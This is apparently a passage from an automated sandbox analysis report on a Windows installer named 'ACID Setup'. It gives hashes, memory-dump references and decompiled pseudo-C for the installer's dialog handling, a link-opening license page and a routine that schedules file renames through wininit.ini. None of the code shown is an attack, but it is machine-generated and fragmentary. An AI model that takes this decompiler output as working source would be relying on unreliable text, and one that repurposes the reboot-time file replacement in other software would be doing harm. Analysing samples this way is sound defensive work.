                                                • Source File: 00000000.00000002.242149090.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction ID: 695824723085038b238e75660bbc8cf0ce23876250f6a7444f9704f8bedd37e8
                                                • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction Fuzzy Hash: C7010C79A51208EFCB51DF99D680A9DBBF5EB08220B118596E958E7721E330AE509B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 023D166E, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.242149090.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004038DB, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 347windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E004038DB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x42a88c = _t33;
					if(_t135 == 0x110) {
						 *0x42f424 = _t117;
						 *0x42a89c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429868 = _t89;
						E00403DC3(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x42a88c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x42f440;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403E0F(0x40b);
						while(1) {
							_t35 =  *0x42a88c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x42f444;
							if(_t37 ==  *0x42f444) {
								E00401410(1);
							}
							__eflags =  *0x42ebec;
							if( *0x42ebec != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x437000);
							E004059FD(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DC3(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x42f4ac;
							_t136 = _t47;
							if( *0x42f4ac != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DE5(_t122 & 0x00000002);
							EnableWindow( *0x429868, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x42f4ac;
							if( *0x42f4ac == 0) {
								_push( *0x42a89c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x429868);
							}
							E00403DF8();
							E004059DB(0x42a8a0, "ACID Setup");
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x42a8a0[lstrlenA(0x42a8a0)]));
							E004059FD(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x42a8a0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)), 0);
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a078 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x42f420,  *_t132 +  *0x42ec00 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x42ebf8 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DC3(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x42ebf8, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)), 0);
											ShowWindow( *0x42ebf8, 8);
											E00403E0F(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x42f4ac - _t65;
								if( *0x42f4ac != _t65) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t65;
								if( *0x42f4a0 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f424 =  *0x42f424 & 0x00000000;
						__eflags =  *0x42f424;
						EndDialog(_t117,  *0x429c70);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)), 0);
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x42a880, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a880,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E2A(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x42f4ac;
											if( *0x42f4ac == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x429c70 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D9C();
												goto L30;
											}
											E00401410(_t134);
											 *0x429c70 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x42f444 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x429868);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b8a0 == 0 &&  *0x42ebf8 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x42b8a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                0x004038e5
                                                0x004038ed
                                                0x00403a66
                                                0x00403a6a
                                                0x00403a6e
                                                0x00403a70
                                                0x00403a75
                                                0x00403a80
                                                0x00403a8b
                                                0x00403a90
                                                0x00403a92
                                                0x00403a94
                                                0x00403a97
                                                0x00403a9c
                                                0x00403aaa
                                                0x00403ab7
                                                0x00403abe
                                                0x00403abe
                                                0x00403abf
                                                0x00403abf
                                                0x00403ac4
                                                0x00403ad1
                                                0x00403ad7
                                                0x00403ad9
                                                0x00403b19
                                                0x00403b1e
                                                0x00403b23
                                                0x00403b23
                                                0x00403b28
                                                0x00403b31
                                                0x00403b33
                                                0x00403b38
                                                0x00403b3e
                                                0x00403b42
                                                0x00403b42
                                                0x00403b47
                                                0x00403b4e
                                                0x00000000
                                                0x00000000
                                                0x00403b59
                                                0x00403b5f
                                                0x00000000
                                                0x00000000
                                                0x00403b65
                                                0x00403b68
                                                0x00403b6b
                                                0x00403b70
                                                0x00403b75
                                                0x00403b78
                                                0x00403b7e
                                                0x00403b83
                                                0x00403b86
                                                0x00403b8c
                                                0x00403b91
                                                0x00403b94
                                                0x00403b9a
                                                0x00403ba2
                                                0x00403ba8
                                                0x00403baf
                                                0x00403bb1
                                                0x00403bb8
                                                0x00403bb8
                                                0x00403bb8
                                                0x00403bc2
                                                0x00403bd1
                                                0x00403bdd
                                                0x00403bec
                                                0x00403c03
                                                0x00403c05
                                                0x00403c0b
                                                0x00403c20
                                                0x00403c0d
                                                0x00403c16
                                                0x00403c18
                                                0x00403c18
                                                0x00403c26
                                                0x00403c36
                                                0x00403c3b
                                                0x00403c46
                                                0x00403c47
                                                0x00403c4e
                                                0x00403c58
                                                0x00403c5d
                                                0x00403c5f
                                                0x00000000
                                                0x00403c65
                                                0x00403c65
                                                0x00403c67
                                                0x00000000
                                                0x00000000
                                                0x00403c6d
                                                0x00403c71
                                                0x00403c96
                                                0x00403c9c
                                                0x00403ca2
                                                0x00403ca5
                                                0x00403ccb
                                                0x00403cd1
                                                0x00403cd3
                                                0x00403cd8
                                                0x00403cde
                                                0x00403ce1
                                                0x00403ce4
                                                0x00403cfb
                                                0x00403d07
                                                0x00403d22
                                                0x00403d2c
                                                0x00403d39
                                                0x00403d44
                                                0x00403d44
                                                0x00403cd8
                                                0x00000000
                                                0x00403ca5
                                                0x00403c73
                                                0x00403c79
                                                0x00000000
                                                0x00000000
                                                0x00403c7f
                                                0x00403c85
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403c8b
                                                0x00403c5f
                                                0x00403d51
                                                0x00403d5d
                                                0x00403d5d
                                                0x00403d65
                                                0x00000000
                                                0x00403adb
                                                0x00403adb
                                                0x00403ade
                                                0x00403b11
                                                0x00403b11
                                                0x00403b13
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403b13
                                                0x00403ae4
                                                0x00403ae9
                                                0x00403aeb
                                                0x00000000
                                                0x00000000
                                                0x00403afb
                                                0x00403b03
                                                0x00000000
                                                0x00403b09
                                                0x004038ff
                                                0x004038ff
                                                0x00403906
                                                0x00403917
                                                0x00403917
                                                0x00403920
                                                0x00403929
                                                0x00403934
                                                0x00403934
                                                0x00403940
                                                0x0040395c
                                                0x0040395f
                                                0x00403974
                                                0x00403977
                                                0x004039ac
                                                0x004039ac
                                                0x004039b2
                                                0x00403a53
                                                0x00000000
                                                0x00403a5c
                                                0x004039b8
                                                0x004039cb
                                                0x004039cd
                                                0x004039cf
                                                0x004039ec
                                                0x004039ef
                                                0x004039f1
                                                0x004039f6
                                                0x004039f9
                                                0x00403a08
                                                0x00403a0b
                                                0x00403a3e
                                                0x00403a51
                                                0x00000000
                                                0x00403a51
                                                0x00403a0d
                                                0x00403a14
                                                0x00403a2d
                                                0x00403a32
                                                0x00403a34
                                                0x00000000
                                                0x00000000
                                                0x00403a36
                                                0x00403a22
                                                0x00403a22
                                                0x00403a24
                                                0x00403a24
                                                0x00000000
                                                0x00403a24
                                                0x00403a17
                                                0x00403a1c
                                                0x00000000
                                                0x00403a1c
                                                0x004039fb
                                                0x00403a02
                                                0x00000000
                                                0x00000000
                                                0x00403a04
                                                0x00000000
                                                0x00403a04
                                                0x004039f3
                                                0x00000000
                                                0x004039f3
                                                0x004039db
                                                0x004039de
                                                0x004039e4
                                                0x004039e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004039e6
                                                0x0040397f
                                                0x00403985
                                                0x00000000
                                                0x00000000
                                                0x00403991
                                                0x00403997
                                                0x00403999
                                                0x00000000
                                                0x00000000
                                                0x0040399f
                                                0x004039a4
                                                0x00000000
                                                0x004039a4
                                                0x00403966
                                                0x00000000
                                                0x00403942
                                                0x00403948
                                                0x00403952
                                                0x00403d6b
                                                0x00403d72
                                                0x00403d80
                                                0x00403d86
                                                0x00403d86
                                                0x00403d90
                                                0x00000000
                                                0x00403d90
                                                0x00403940

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403917
                                                • ShowWindow.USER32(?), ref: 00403934
                                                • DestroyWindow.USER32 ref: 00403948
                                                • SetWindowLongA.USER32 ref: 00403966
                                                • IsWindowEnabled.USER32 ref: 00403991
                                                • GetDlgItem.USER32 ref: 004039BF
                                                • SendMessageA.USER32 ref: 004039DB
                                                • IsWindowEnabled.USER32(00000000), ref: 004039DE
                                                • GetDlgItem.USER32 ref: 00403A86
                                                • GetDlgItem.USER32 ref: 00403A90
                                                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AAA
                                                • SendMessageA.USER32 ref: 00403AFB
                                                • GetDlgItem.USER32 ref: 00403BA2
                                                • ShowWindow.USER32(00000000,?), ref: 00403BC2
                                                • EnableWindow.USER32(00000000,?), ref: 00403BD1
                                                • EnableWindow.USER32(?,?), ref: 00403BEC
                                                • SendMessageA.USER32 ref: 00403C03
                                                • SendMessageA.USER32 ref: 00403C16
                                                • lstrlenA.KERNEL32(0042A8A0,?,0042A8A0,ACID Setup), ref: 00403C3F
                                                • SetWindowTextA.USER32(?,0042A8A0), ref: 00403C4E
                                                • ShowWindow.USER32(?,0000000A), ref: 00403D80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                • String ID: ACID Setup
                                                • API String ID: 3950083612-3593025689
                                                • Opcode ID: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
                                                • Instruction ID: 006876bbb85f53b20e6cd7df4346cbfae3e875a0e3379fd521061c3a37ebfb4f
                                                • Opcode Fuzzy Hash: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
                                                • Instruction Fuzzy Hash: 59C1A071604201ABDB30AF26ED45F273EACEB44716F80093AF556B51F1D678A942CB1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F0B, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E00403F0B(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a888 =  *0x42a888 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E2A(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f424, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f424, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a888 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a078 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DE5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404196();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x5bda93
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f458;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403ED7;
				E00403DC3(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DC3(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DE5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DF8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f428 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x42986c =  *0x42986c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a888 =  *0x42a888 & 0x00000000;
				return 0;
			}


















                                                0x00403f1b
                                                0x00404041
                                                0x0040409d
                                                0x004040a1
                                                0x00404178
                                                0x0040417a
                                                0x0040417a
                                                0x00404180
                                                0x00404180
                                                0x00404183
                                                0x00000000
                                                0x0040418a
                                                0x004040af
                                                0x004040b1
                                                0x004040bb
                                                0x004040c6
                                                0x004040c9
                                                0x004040cc
                                                0x004040d7
                                                0x004040da
                                                0x004040e1
                                                0x004040ef
                                                0x00404107
                                                0x0040411a
                                                0x0040412a
                                                0x0040412c
                                                0x0040412c
                                                0x004040e1
                                                0x00404136
                                                0x00000000
                                                0x00404141
                                                0x00404145
                                                0x00404156
                                                0x00404156
                                                0x0040415c
                                                0x0040416a
                                                0x0040416a
                                                0x00000000
                                                0x0040416e
                                                0x00404136
                                                0x0040404c
                                                0x00000000
                                                0x00404060
                                                0x00404066
                                                0x0040406c
                                                0x00000000
                                                0x00000000
                                                0x00404091
                                                0x00404093
                                                0x00404098
                                                0x00000000
                                                0x00404098
                                                0x0040404c
                                                0x00403f21
                                                0x00403f24
                                                0x00403f29
                                                0x00403f2b
                                                0x00403f3a
                                                0x00403f3a
                                                0x00403f41
                                                0x00403f44
                                                0x00403f46
                                                0x00403f4b
                                                0x00403f54
                                                0x00403f5a
                                                0x00403f66
                                                0x00403f69
                                                0x00403f72
                                                0x00403f77
                                                0x00403f7a
                                                0x00403f7f
                                                0x00403f96
                                                0x00403f9d
                                                0x00403fb0
                                                0x00403fb3
                                                0x00403fc8
                                                0x00403fcf
                                                0x00403fd4
                                                0x00403fd9
                                                0x00403fd9
                                                0x00403fe8
                                                0x00403ff7
                                                0x00403ff9
                                                0x0040400f
                                                0x0040401e
                                                0x00404020
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$YVfgfgfgfgfg$open
                                                • API String ID: 3615053054-2887594096
                                                • Opcode ID: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
                                                • Instruction ID: 74e3a25a4ac884a07ee3b1bf84c617da9f937bcc22f9c720612e6a340156d24e
                                                • Opcode Fuzzy Hash: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
                                                • Instruction Fuzzy Hash: 8761B571A40209BFDB10AF60DD45F6A3BA9EB54715F10403AFB017A2D1C7B8A951CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405723, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00405723(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CEE("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x42f4b0 =  *0x42f4b0 + 1;
						return _t19;
					}
				}
				 *0x42ca30 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x42c4a8, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x42c0a8, "%s=%s\r\n", 0x42ca30, 0x42c4a8);
						GetWindowsDirectoryA(0x42c4a8, 0x3f0);
						lstrcatA(0x42c4a8, "\\wininit.ini");
						_t19 = CreateFileA(0x42c4a8, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405640(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405640(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E0040568C(_t52 + _t28, 0x42c0a8, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059DB(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056AC(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x42ca30, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                                0x00405731
                                                0x00405738
                                                0x0040573c
                                                0x00405745
                                                0x00405749
                                                0x00405895
                                                0x00405895
                                                0x00000000
                                                0x00405895
                                                0x00405749
                                                0x00405755
                                                0x0040576b
                                                0x00405793
                                                0x0040579e
                                                0x004057a2
                                                0x004057c5
                                                0x004057cd
                                                0x004057d9
                                                0x004057f0
                                                0x004057f6
                                                0x004057fb
                                                0x00000000
                                                0x00000000
                                                0x0040580a
                                                0x0040580c
                                                0x00405819
                                                0x0040581d
                                                0x0040588e
                                                0x0040588f
                                                0x00000000
                                                0x00405839
                                                0x00405846
                                                0x004058ab
                                                0x004058b2
                                                0x00405859
                                                0x00405859
                                                0x0040585b
                                                0x00405864
                                                0x0040586f
                                                0x00405881
                                                0x00405888
                                                0x00000000
                                                0x00405888
                                                0x004058b4
                                                0x004058ba
                                                0x004058bc
                                                0x004058cb
                                                0x004058cb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004058be
                                                0x004058be
                                                0x004058c0
                                                0x004058c3
                                                0x004058c7
                                                0x00000000
                                                0x004058be
                                                0x00405851
                                                0x00405856
                                                0x00000000
                                                0x00405856
                                                0x0040581d
                                                0x0040576d
                                                0x00405778
                                                0x00405781
                                                0x00405785
                                                0x00000000
                                                0x00000000
                                                0x00405785
                                                0x0040589f

                                                APIs
                                                  • Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
                                                  • Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
                                                  • Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
                                                • GetShortPathNameA.KERNEL32 ref: 00405781
                                                • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                • wsprintfA.USER32 ref: 004057BC
                                                • GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
                                                • lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
                                                • CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829
